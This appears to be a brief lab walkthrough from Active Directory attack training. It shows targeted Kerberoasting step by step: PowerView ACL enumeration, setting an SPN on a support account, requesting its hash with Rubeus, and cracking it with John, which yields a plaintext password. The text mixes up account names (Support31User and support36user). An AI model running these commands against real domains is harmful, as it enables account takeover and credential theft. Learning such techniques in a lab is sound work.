Enumerating Interacting ACLs for student users

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}

Notice that SutdentUsers have Generic All permissions on Support31User

Now let’s Set and SPN to the Support36User

Set-DomainObject -Identity support36user -Set @{serviceprincipalname="us/myspn36"}

Now let’s check if the user have an SPN Set or not

Get-DomainUser -Identity support36user | select samaccountname,serviceprincipalname

Greet the user now have SPN set on it

Let’s request the hash using Rubeus

.\\Rubeus.exe kerberoast /user:support36user /simple /rc4opsec

Now let’s crack the hash using John

john crackme.txt --wordlist=/usr/share/wordlists/10k-worst-pass.txt

Amazing!

username: support36user
password: Desk@123